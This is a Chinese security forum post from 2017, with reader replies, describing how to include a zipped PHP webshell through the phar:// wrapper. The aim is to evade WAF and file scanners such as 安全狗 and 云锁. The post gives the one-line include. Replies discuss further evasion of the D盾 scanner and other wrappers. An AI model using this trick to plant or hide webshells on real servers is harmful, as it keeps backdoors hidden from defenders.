利用phar://协议绕过waf检测拦截

2017-04-09 16:48:29 65 jzking121 7404 3

phar:// 数据流包装器自 PHP 5.3.0 起开始有效。
利用phar://协议特性可以在渗透过程中帮我们绕过一些waf检测。
现在一些waf会检测文件的内容，我们可以通过包含的方式，包含zip后缀或者phar后缀里面的文件达到绕过防护的目的。

实测：PhpSpy 2010 过安全狗4.0 云锁拦截

php内容：

<?php

include 'phar://2010.zip/2010.php';

?>

2010.zip是我压缩大马后的文件。注意用zip压缩。文件后缀名可以是任何名字。

参考：
http://php.net/manual/zh/wrappers.phar.php

类别渗透测试

关于作者

jzking1218篇文章41篇回复

jzking121

评论65次

要评论？请先登录或注册

25楼

blnxz
2017-4-10 09:42

hackrx：
强势，很好用，这算不算高级一点的包含
回复|@ta
1

算文件包含，我记得好像默认不开启

回复|@ta|踩(0)|顶(0)
24楼

lcvv_
2017-4-10 09:33

能带密码吗？？？

回复|@ta|踩(0)|顶(0)
23楼

枫叶
2017-4-10 09:11

不太适用低版本啊

回复|@ta|踩(0)|顶(0)
22楼

小隐
2017-4-10 08:52

这波可以有

回复|@ta|踩(0)|顶(0)
21楼

dgo6ktrr
2017-4-10 07:42

思路不错

回复|@ta|踩(0)|顶(0)
20楼

qhkest
2017-4-10 05:41

确实不错思路，过几天我也发个bypass waf的。

回复|@ta|踩(0)|顶(0)
19楼

huo001
2017-4-10 05:21

可以会不会也不怎么安全如果某些大牛的字典牛逼的不行去扫描压缩文件

回复|@ta|踩(0)|顶(0)
18楼

whoamiyx
2017-4-10 00:29

玩狗的新姿势吗？

回复|@ta|踩(0)|顶(0)
17楼

三流火
2017-4-9 23:09

文件包含 phar zip rar data 都是可以利用的姿势

回复|@ta|踩(0)|顶(0)
16楼

GET丶Boy
2017-4-9 22:54

楼主，QQ甩来，加个好友

回复|@ta|踩(0)|顶(0)
15楼

houdao
2017-4-9 22:09

感觉过不了几天有被安全狗收纳了。

回复|@ta|踩(0)|顶(0)
14楼

hackrx
2017-4-9 20:55

强势，很好用，这算不算高级一点的包含

回复|@ta|踩(0)|顶(0)
13楼

dubing123
2017-4-9 19:19

伪协议，以前ctf中有利用过，思路又开阔了！

回复|@ta|踩(0)|顶(0)
12楼

Anonymous
2017-4-9 19:02

测试了，常见如zip协议什么的都可以，首先要马免杀，不然就算你压缩，D盾还是能查出来。

回复|@ta|踩(0)|顶(0)
11楼

千决nt
2017-4-9 18:56

不知道多次压缩再多次包含能不能有更好的免杀效果呢

回复|@ta|踩(0)|顶(0)
10楼

yzhk520
2017-4-9 18:37

奇淫技巧，值得学xi

回复|@ta|踩(0)|顶(0)
9楼

猫店主
2017-4-9 18:35

phar://一般要php版本大于5.3，这个协议我本地测试可以用，但是zip://协议一直没成功，楼主有什么姿势介绍吗

回复|@ta|踩(0)|顶(0)
8楼

代码如诗
2017-4-9 18:23

这个没用过有没有什么特别应用场景啊

回复|@ta|踩(0)|顶(0)
7楼

这只猪
2017-4-9 17:52

弱弱的问句，这个协议是可以自解压码

回复|@ta|踩(0)|顶(0)
6楼

sushi
2017-4-9 17:50

一直不会用phar

回复|@ta|踩(0)|顶(0)